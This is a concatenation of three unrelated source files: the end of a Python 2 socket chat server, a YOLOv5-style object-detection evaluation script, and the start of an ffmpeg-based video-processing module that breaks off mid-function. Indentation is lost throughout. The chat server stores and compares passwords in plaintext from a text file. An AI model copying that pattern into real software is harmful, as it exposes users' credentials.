# multithread safe update of user port and ip
def thread_add_user_port_ip(user, port, ip):
global lock
lock.acquire()
try:
user.port = int(port)
user.ip = ip
finally:
lock.release()
# multithread safe update of user blocked list
def thread_add_blocking_user(user, blocking_user):
global lock
lock.acquire()
try:
user.blocked_me[blocking_user] = 1
finally:
lock.release()
# multithread safe removal of user blocked list
def thread_remove_blocking_user(user, blocking_user):
global lock
lock.acquire()
try:
del user.blocked_me[blocking_user]
finally:
lock.release()
# multithread safe addition of user peer
def thread_add_private_peer(user, peer):
global lock
lock.acquire()
try:
user.private_peer = peer
finally:
lock.release()
# multithread safe lock out of user
def thread_lock_out_user(user):
global lock
lock.acquire()
try:
user.locked_out = True
finally:
lock.release()
# multithread safe unlock of user
def thread_unlock_out_user(user):
global lock
lock.acquire()
try:
user.locked_out = False
finally:
lock.release()
# multithread safe addition to mailbox
def thread_add_to_mailbox(user, message):
global lock
lock.acquire()
try:
user.mailbox.append(message)
finally:
lock.release()
# multithread safe clearing of mailbox
def thread_clear_mailbox(user):
global lock
lock.acquire()
try:
user.mailbox = []
finally:
lock.release()
# multithread safe check of all the live users
def thread_check_pulse():
global lock
global user_list
lock.acquire()
try:
for user in user_list:
if user.logged_in == True and user.active == False:
user.logged_in = False
broadcast_message(user.username + ' logged out', user.username,
False)
user.active = False
finally:
lock.release()
# launch next pulse thread after TIMEOUT seconds
time.sleep(TIMEOUT)
check = threading.Thread(target=thread_check_pulse)
check.daemon = True
check.start()
return(0)
# return string with pretty printed online users
def get_online_users(current_user):
global user_list
username_list = []
for user in user_list:
# do not include offline users and current user
if user.logged_in == True and user is not current_user:
# do not allow blocked users to see
try:
current_user.blocked_me[user.username]
continue
except Exception:
username_list.append(user.username)
return '\n'.join(username_list)
# send messages out to all online clients
def broadcast_message(message, sender, is_login):
global user_list
send_user = find_user(sender)
for user in user_list:
# presence broadcasts and other broadcasts have
# different requirements as far as blocking goes
if is_login:
try:
user.blocked_me[send_user.username]
continue
except Exception:
if user.logged_in == True and user.username != sender:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((user.ip, user.port))
delay_send(sock, 'BCST', message)
except Exception:
print 'client connection closed'
sock.close()
else:
try:
send_user.blocked_me[user.username]
continue
except Exception:
if user.logged_in == True and user.username != sender:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((user.ip, user.port))
delay_send(sock, 'BCST', message)
except Exception:
print 'client connection closed'
sock.close()
# send message through the server to a specific client
def send_message(message, sender, receiver, code):
rec_user = find_user(receiver)
if rec_user == None or receiver == sender:
ret_user = find_user(sender)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((ret_user.ip, ret_user.port))
delay_send(sock, code, receiver + ' is not a valid user.')
except Exception:
# guaranteed delivery, will at least go to mailbox
thread_add_to_mailbox(ret_user, message)
sock.close()
elif rec_user.logged_in == True:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((rec_user.ip, rec_user.port))
delay_send(sock, code, message)
except Exception:
# guaranteed delivery, will at least go to mailbox
thread_add_to_mailbox(rec_user, message)
sock.close()
else:
thread_add_to_mailbox(rec_user, message)
# send with a slight delay, fixed some timing issues I was having
def delay_send(connection, code, message):
try:
connection.sendall(code)
time.sleep(.1)
connection.sendall(message)
except Exception:
print 'connection broken'
# check if this port is free, avoid race condition
def check_port_free(port_number):
global user_list
for user in user_list:
if user.port == port_number:
return False
return True
# timeout function to be called by timeout thread
def lock_out_timeout(user):
global LOCKOUT
time.sleep(LOCKOUT)
thread_unlock_out_user(user)
return 0
# add new user to text file
def add_newuser(answer):
print 'Saved! log back in'
# serve the connections
def serve_client(connection):
global user_list
greeting = connection.recv(RECV_SIZE)
'''
PTCK - port check, see if a port is free
HELO - hello, initial greeting to get ready
USER - username, time to get username info from client
AUTH - authentication, getting password and checking if valid
LIVE - heartbeat, checking to see if the client is still online_users
CMND - command, numerous commands that are outlined below
'''
if greeting == 'PTCK':
port_to_check = int(connection.recv(RECV_SIZE))
port_free = check_port_free(port_to_check)
if port_free:
delay_send(connection, 'GDPT', '')
else:
delay_send(connection, 'BDPT', '')
elif greeting == 'HELO':
connection.recv(RECV_SIZE)
delay_send(connection, 'NUSER', 'New user? click "y", click any other button for no: ')
elif greeting == "NUSER":
try:
info = connection.recv(RECV_SIZE).split()
except Exception:
print 'connection broke'
delay_send(connection, 'USER', 'LOGIN!\nUsername: ')
elif greeting == 'USER':
try:
info = connection.recv(RECV_SIZE).split()
except Exception:
print 'connection broke'
username = info[0]
port = info[1]
ip = info[2]
file_obj = open('credentials.txt', 'r')
next_line = file_obj.readline()
while next_line != '':
line = str.split(next_line, '\n')
line = str.split(line[0], ' ')
user_list.append(User(line[0], line[1]))
next_line = file_obj.readline()
# check to see if it's a valid username
user = find_user(username)
if user == None:
try:
delay_send(connection, 'FAIL', 'User not found. Try again')
except Exception:
print 'client connection closed'
elif user.locked_out == True:
delay_send(connection, 'FAIL',
'Your account is still locked out\n')
else:
thread_add_user(user)
thread_add_user_port_ip(user, port, ip)
delay_send(connection, 'PASS', 'Password: ')
elif greeting == 'AUTH':
try:
info = connection.recv(RECV_SIZE).split()
except Exception:
print 'connection broke'
username = info[0]
password = info[1]
try_num = int(info[2])
user = find_user(username)
if try_num == 3 and password != user.password:
# launch timeout thread
thread_lock_out_user(user)
t = threading.Thread(target=lock_out_timeout, args=(user,))
t.daemon = True
t.start()
# send sad message
delay_send(connection, 'FAIL', 'Due to multiple login failures, ' +
'your account has been blocked. Please ' +
'try again after ' + str(LOCKOUT) +
' seconds.')
elif password != user.password:
delay_send(connection, 'DENY', 'Invalid Password. ' +
'Please try again\n>Password: ')
else:
if user.logged_in == True:
send_message('Another computer has logged in with your ' +
'username and password.', '', username, 'LOGO')
delay_send(connection, 'SUCC',
'>Welcome to simple chat server!')
time.sleep(.1)
# check mail
if not user.mailbox:
mail = '>No offline messages'
else:
mail = '\n'.join(user.mailbox)
thread_clear_mailbox(user)
delay_send(connection, username,
'>Offline Messages:\n' + mail)
broadcast_message(username + ' logged in', username, True)
elif greeting == 'LIVE':
username = connection.recv(RECV_SIZE)
print 'LIVE: ' + username
user = find_user(username)
if user == None:
print 'user broke off'
elif user.logged_in == False:
print 'user died, no heartbeat'
else:
thread_update_live_user(user)
delay_send(connection, 'LIVE', 'Still living')
elif greeting == 'CMND':
user_input = connection.recv(RECV_SIZE)
username = connection.recv(RECV_SIZE)
user = find_user(username)
input_array = user_input.split()
'''
logout - user.logged_in is marked as False
who - user queries database for online users
sendall - broadcasts message to all online clients
send - messages specific client, online or offline
extra stuff
getaddress - gets IP and port info for P2P
consent - gives client access to P2P information
block - blacklists a given user
unblock - removes given user from blacklist
'''
if user == None:
print 'user broke off'
elif user_input == '\n':
print 'pressed enter'
elif user_input == 'logout':
thread_remove_user(user)
delay_send(connection, 'LOGO', 'logout')
broadcast_message(username + ' logged out', username, True)
elif user_input == 'who':
online_users = get_online_users(user)
delay_send(connection, 'ONLN', online_users)
elif input_array[0] == 'sendall':
delay_send(connection, 'BCST', '')
broadcast_message(username + ': ' + user_input[len('sendall '):],
username, False)
elif input_array[0] == 'send' and len(input_array) > 1:
delay_send(connection, 'MESG', '')
receiver = input_array[1]
# make sure to check for blocking
try:
user.blocked_me[receiver]
send_message('You are blocked by ' + receiver, '',
username, 'MESG')
except Exception:
message = user_input[(len('send ') + len(receiver) + 1):]
send_message(username + ': ' + message, username, receiver,
'MESG')
elif input_array[0] == 'getaddress' and len(input_array) == 2:
contact = input_array[1]
contact_user = find_user(contact)
# check to make sure user is not yourself
if contact_user == None:
delay_send(connection, 'NGET',
contact + ' is not a valid user.')
elif(len(input_array) == 2 and username != contact
and contact_user.logged_in):
try:
user.blocked_me[contact]
delay_send(connection, 'NGET', 'Blocked by ' + contact)
except Exception:
thread_add_private_peer(user, contact)
send_message(username + ' is requesting a private chat. ' +
'To share your IP and port with them, reply saying ' +
'\'consent '+ username +'\'', username, contact, 'RQST')
else:
delay_send(connection, 'NGET', 'Invalid request')
elif input_array[0] == 'consent' and len(input_array) == 2:
contact = input_array[1]
contact_user = find_user(contact)
if contact_user == None:
delay_send(connection, 'NGET',
contact + ' is not a valid user.')
elif len(input_array) == 2 and username != contact:
peer = find_user(contact)
if username == peer.private_peer:
send_message(str(user.port) + ' ' + user.ip + ' ' +
username, username, contact, 'GETA')
else:
send_message(contact + ' has not requested a P2P chat ' +
'with you. Use the getaddress command to start one',
contact, username, 'NGET')
elif input_array[0] == 'block' and len(input_array) == 2:
to_block = input_array[1]
block_user = find_user(to_block)
if block_user == None:
delay_send(connection, 'NGET',
to_block + ' is not a valid user.')
elif len(input_array) == 2 and username != to_block:
thread_add_blocking_user(find_user(to_block), username)
delay_send(connection, 'BLOK', 'User ' + to_block +
' has been blocked')
else:
delay_send(connection, 'NBLK', 'Unable to block user')
elif input_array[0] == 'unblock' and len(input_array) == 2:
to_unblock = input_array[1]
unblock_user = find_user(to_unblock)
if unblock_user == None:
delay_send(connection, 'NGET',
to_unblock + ' is not a valid user.')
elif len(input_array) == 2 and username != to_unblock:
thread_remove_blocking_user(find_user(to_unblock), username)
delay_send(connection, 'UBLK', 'User ' + to_unblock +
' is unblocked')
else:
delay_send(connection, 'NUBK', 'Unable to unblock user')
else:
delay_send(connection, 'RECV', 'Invalid Command: ' + user_input)
connection.close()
return(0)
# parent process which keeps accepting connections
def main_thread():
global user_list
global PORT
global HOST
if len(sys.argv) < 1:
print 'usage: python Server.py'
exit(1)
HOST = ''
PORT = 18590
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
#MAX CLIENTS ARE listening at 3
s.listen(3)
# build all the users
file_obj = open('credentials.txt', 'r')
next_line = file_obj.readline()
while next_line != '':
line = str.split(next_line, '\n')
line = str.split(line[0], ' ')
user_list.append(User(line[0], line[1]))
next_line = file_obj.readline()
# launch the pulse checking daemon
check = threading.Thread(target=thread_check_pulse)
check.daemon = True
check.start()
# continuously running thread manager
while True:
conn, addr = s.accept()
print 'Connected by ', addr
t = threading.Thread(target=serve_client, args=(conn,))
t.start()
# ^C terminate gracefully
def ctrl_c_handler(signum, frame):
exit(0)
# kick off signal handlers and the main thread
def main():
signal.signal(signal.SIGINT, ctrl_c_handler)
signal.signal(signal.SIGPIPE, signal.SIG_IGN)
main_thread()
if __name__ == '__main__':
main()
|
test.py
|
import argparse
import json
import os
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
def test(data,
weights=None,
batch_size=32,
imgsz=640,
conf_thres=0.001,
iou_thres=0.6, # for NMS
save_json=False,
single_cls=False,
augment=False,
verbose=False,
model=None,
dataloader=None,
save_dir=Path(''), # for saving images
save_txt=False, # for auto-labelling
save_hybrid=False, # for hybrid auto-labelling
save_conf=False, # save auto-label confidences
plots=True,
wandb_logger=None,
compute_loss=None,
is_coco=False):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
set_logging()
device = select_device(opt.device, batch_size=batch_size)
# Directories
save_dir = Path(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok)) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
gs = max(int(model.stride.max()), 32) # grid size (max stride)
imgsz = check_img_size(imgsz, s=gs) # check img_size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Half
half = device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
if isinstance(data, str):
is_coco = data.endswith('coco.yaml')
with open(data) as f:
data = yaml.load(f, Loader=yaml.SafeLoader)
check_dataset(data) # check
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Logging
log_imgs = 0
if wandb_logger and wandb_logger.wandb:
log_imgs = min(wandb_logger.log_imgs, 100)
# Dataloader
if not training:
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
task = opt.task if opt.task in ('train', 'val', 'test') else 'val' # path to train/val/test images
dataloader = create_dataloader(data[task], imgsz, batch_size, gs, opt, pad=0.5, rect=True,
prefix=colorstr(f'{task}: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
with torch.no_grad():
# Run model
t = time_synchronized()
out, train_out = model(img, augment=augment) # inference and training outputs
t0 += time_synchronized() - t
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1][:3] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_synchronized()
out = non_max_suppression(out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb, multi_label=True)
t1 += time_synchronized() - t
# Statistics per image
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if save_txt:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging - Media Panel Plots
if len(wandb_images) < log_imgs and wandb_logger.current_epoch > 0: # Check for test operation
if wandb_logger.current_epoch % wandb_logger.bbox_interval == 0:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb_logger.wandb.Image(img[si], boxes=boxes, caption=path.name))
wandb_logger.log_training_progress(predn, path, names) # logs dsviz tables
# Append to pycocotools JSON dictionary
if save_json:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if plots:
confusion_matrix.process_batch(predn, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
# Plot images
if plots and batch_i < 3:
f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%12i' * 2 + '%12.3g' * 4 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb_logger and wandb_logger.wandb:
val_batches = [wandb_logger.wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]
wandb_logger.log({"Validation": val_batches})
if wandb_images:
wandb_logger.log({"Bounding Box Debugger/Images": wandb_images})
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='test.py')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path')
parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch')
parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
parser.add_argument('--task', default='val', help='train, val, test, speed or study')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
parser.add_argument('--project', default='runs/test', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.data = check_file(opt.data) # check file
print(opt)
check_requirements()
if opt.task in ('train', 'val', 'test'): # run normally
test(opt.data,
opt.weights,
opt.batch_size,
opt.img_size,
opt.conf_thres,
opt.iou_thres,
opt.save_json,
opt.single_cls,
opt.augment,
opt.verbose,
save_txt=opt.save_txt | opt.save_hybrid,
save_hybrid=opt.save_hybrid,
save_conf=opt.save_conf,
)
elif opt.task == 'speed': # speed benchmarks
for w in opt.weights:
test(opt.data, w, opt.batch_size, opt.img_size, 0.25, 0.45, save_json=False, plots=False)
elif opt.task == 'study': # run over a range of settings and save/plot
# python test.py --task study --data coco.yaml --iou 0.7 --weights yolov5s.pt yolov5m.pt yolov5l.pt yolov5x.pt
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
print(f'\nRunning {f} point {i}...')
r, _, t = test(opt.data, w, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json,
plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(x=x) # plot
|
video.py
|
import os
import subprocess as sp
import re
import sys
import threading
import logging
import signal
from math import ceil
from queue import Queue, Empty
from gevent import idle
from config import config
from imageProcess import clean
from procedure import genProcess
from progress import Node, initialETA
from worker import context, begin
from runSlomo import RefTime as SlomoRefs
from videoSR import RefTime as VSRRefs
from ESTRNN import para as ESTRNNpara
log = logging.getLogger('Moe')
ffmpegPath = os.path.realpath('ffmpeg/bin/ffmpeg') # require full path to spawn in shell
qOut = Queue(256)
stepVideo = [dict(op='buffer', bitDepth=16)]
pix_fmt = 'bgr48le'
pixBytes = 6
bufsize = 10 ** 8
isWindows = sys.platform[:3] == 'win'
reMatchInfo = re.compile(r'Stream #.*: Video:')
reSearchInfo = re.compile(r',[\s]*([\d]+)x([\d]+)[\s]*.+,[\s]*([.\d]+)[\s]*(fps|tbr)')
reMatchFrame = re.compile(r'frame=')
reSearchFrame = re.compile(r'frame=[\s]*([\d]+) ')
reMatchAudio = re.compile(r'Stream #0:1')
reMatchOutput = re.compile(r'Output #0,')
formats = {'.mp4', '.ts', '.mkv'}
creationflag = sp.CREATE_NEW_PROCESS_GROUP if isWindows else 0
sigint = signal.CTRL_BREAK_EVENT if isWindows else signal.SIGINT
lookback = dict(slomo=SlomoRefs >> 1, VSR=VSRRefs >> 1, demob=ESTRNNpara.past_frames)
lookahead = dict(slomo=(SlomoRefs - 1) >> 1, VSR=(VSRRefs - 1) >> 1, demob=ESTRNNpara.future_frames)
resizeOp = {'SR', 'resize', 'VSR'}
padOp = {'VSR', 'demob'}
popen = lambda command: sp.Popen(command, stdout=sp.PIPE, stderr=sp.PIPE, bufsize=bufsize, creationflags=creationflag)
popenText = lambda command: sp.Popen(command, stderr=sp.PIPE, encoding='utf_8', errors='ignore')
insert1 = lambda t, s: ''.join((t[0], s, *t[1:]))
splitext = lambda p: os.path.splitext(p)
fixExt = lambda t: ''.join((*t[:-1], t[-1] if t[-1] in formats else '.mkv'))
suffix = lambda p, s: insert1(splitext(p), s)
clipList = lambda l, start, end: l[:start] + l[end:]
commandVideoSkip = lambda command: clipList(command, 15, 25)
def removeFile(path):
try:
os.remove(path)
except FileNotFoundError: pass
except PermissionError as e:
log.error(str(e))
def getVideoInfo(videoPath, by, width, height, frameRate):
commandIn = [
ffmpegPath,
'-hide_banner',
'-t', '1',
'-f', 'lavfi',
'-i', videoPath,
'-map', '0:v:0',
'-c', 'copy',
'-f', 'null',
'-'
]
matchInfo = not (width and height and frameRate)
matchFrame = not by
matchOutput = True
error = RuntimeError('Video info not found')
videoOnly = True
if by != 'cmd':
commandIn = clipList(commandIn, 4, 6)
if matchFrame:
commandIn = clipList(commandIn, 2, 4)
try:
procIn = popenText(commandIn)
totalFrames = 0
while matchInfo or matchOutput or matchFrame:
line = procIn.stderr.readline()
if type(line) != str:
line = str(line, 'utf-8', errors='ignore')
sys.stdout.write(line)
if not line:
break
line = line.lstrip()
if reMatchOutput.match(line):
matchOutput = False
elif reMatchAudio.match(line):
videoOnly = False
if matchInfo and reMatchInfo.match(line):
try:
videoInfo = reSearchInfo.search(line).groups()
if not width:
width = int(videoInfo[0])
if not height:
height = int(videoInfo[1])
if not frameRate:
frameRate = float(videoInfo[2])
except Exception:
log.error(line)
raise error
matchInfo = False
if matchFrame and reMatchFrame.match(line):
try:
totalFrames = int(reSearchFrame.search(line).groups()[0])
except Exception:
log.error(line)
procIn.stderr.flush()
procIn.stderr.close()
finally:
procIn.terminate()
if matchInfo or (matchFrame and not totalFrames):
raise error
log.info('Info of video {}: {}x{}@{}fps, {} frames'.format(videoPath, width, height, frameRate, totalFrames))
return width, height, frameRate, totalFrames, videoOnly
def enqueueOutput(out, queue):
try:
for line in iter(out.readline, b''):
queue.put(line)
out.flush()
except Exception: pass
def createEnqueueThread(pipe, *args):
t = threading.Thread(target=enqueueOutput, args=(pipe, qOut, *args))
t.daemon = True # thread dies with the program
t.start()
def readSubprocess(q):
while True:
try:
line = q.get_nowait()
if not type(line) == str:
line = str(line, encoding='utf_8', errors='replace')
except Empty:
break
else:
sys.stdout.write(line)
def prepare(video, by, steps):
optEncode = steps[-1]
encodec = optEncode.get('codec', config.defaultEncodec) # pylint: disable=E1101
optDecode = steps[0]
decodec = optDecode.get('codec', config.defaultDecodec) # pylint: disable=E1101
optRange = steps[1]
start = int(optRange.get('start', 0))
outDir = config.outDir # pylint: disable=E1101
procSteps = stepVideo + list(steps[2:-1])
diagnose = optEncode.get('diagnose', {})
bench = diagnose.get('bench', False)
clear = diagnose.get('clear', False)
process, nodes = genProcess(procSteps)
traceDetail = config.progressDetail or bench # pylint: disable=E1101
root = begin(Node({'op': 'video'}, 1, 2, 0), nodes, traceDetail, bench, clear)
context.root = root
slomos = [step for step in procSteps if step['op'] == 'slomo']
refs, ahead = 0, 0
if start < 0:
start = 0
for i in range(len(procSteps) - 1, -1, -1): # gather some reference frames before start point for video models
step = procSteps[i]
if step['op'] == 'slomo':
step['opt'].outStart = -refs % step['sf'] if refs else 1
step['opt'].outEnd = -(-ahead % step['sf'])
refs = max(ceil(refs / step['sf']), lookback[step['op']])
ahead = max(ceil(ahead / step['sf']), lookahead[step['op']])
elif step['op'] in padOp:
step['opt'].start = 0
step['opt'].end = 0
refs += lookback[step['op']]
ahead += lookahead[step['op']]
if start < refs: # no enough reference frames
arefs = start
for step in procSteps:
if arefs >= refs:
break
if step['op'] == 'slomo':
refs = refs * step['sf'] - step['opt'].outStart
step['opt'].outStart = 0
arefs = arefs * step['sf']
elif step['op'] in padOp:
step['opt'].start = min(refs - arefs, lookback[step['op']])
refs -= step['opt'].start
start = 0
else:
start -= refs
stop = int(optRange.get('stop', -1))
if stop <= start:
stop = -1
root.total = -1 if stop < 0 else stop - start
outputPath = fixExt(splitext(optEncode.get('file', '') or outDir + '/' + config.getPath()))
dataPath = suffix(outputPath, '-a')
commandIn = [
ffmpegPath,
'-hide_banner',
'-f', 'lavfi',
'-i', video,
'-vn',
'-c', 'copy',
'-y',
dataPath,
'-map', '0:v',
'-f', 'rawvideo',
'-pix_fmt', pix_fmt]
if by != 'cmd':
commandIn = clipList(commandIn, 2, 4)
if len(decodec):
commandIn.extend(decodec.split(' '))
commandIn.append('-')
metadata = ['-metadata', 'service_provider="MoePhoto {}"'.format(config.version)] # pylint: disable=E1101
commandVideo = [
ffmpegPath,
'-hide_banner', '-y',
'-f', 'rawvideo',
'-pix_fmt', pix_fmt,
'-s', '',
'-r', '',
'-thread_queue_size', '64',
'-i', '-',
'-i', dataPath,
'-map', '0:v',
'-map', '1?',
'-map', '-1:v',
'-c:1', 'copy',
*metadata,
'-c:v:0'
] + encodec.split(' ') + ['']
commandOut = None
if by:
